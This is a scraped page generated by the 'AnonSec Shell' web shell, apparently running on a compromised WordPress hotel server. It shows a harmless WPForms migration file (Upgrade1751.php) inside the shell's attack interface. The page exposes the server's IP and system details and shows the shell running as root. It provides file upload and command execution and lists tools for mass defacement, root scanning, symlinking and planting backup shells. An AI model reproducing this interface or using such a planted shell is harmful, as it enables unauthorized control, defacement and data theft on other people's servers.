AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/1534260/task/1534260/cwd/plugins/wpforms-lite/src/Migrations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/1534260/task/1534260/cwd/plugins/wpforms-lite/src/Migrations/Upgrade1751.php
<?php

namespace WPForms\Migrations;

/**
 * Class v1.7.5.1 upgrade.
 *
 * @since 1.7.5.1
 *
 * @noinspection PhpUnused
 */
class Upgrade1751 extends UpgradeBase {

	/**
	 * Repeat 1.7.5 migration.
	 *
	 * @since 1.7.5.1
	 *
	 * @return bool|null Upgrade result:
	 *                   true  - the upgrade completed successfully,
	 *                   false - in the case of failure,
	 *                   null  - upgrade started but not yet finished (background task).
	 */
	public function run() {

		return ( new Upgrade175( $this->migrations ) )->run();
	}
}

Anon7 - 2022
AnonSec Team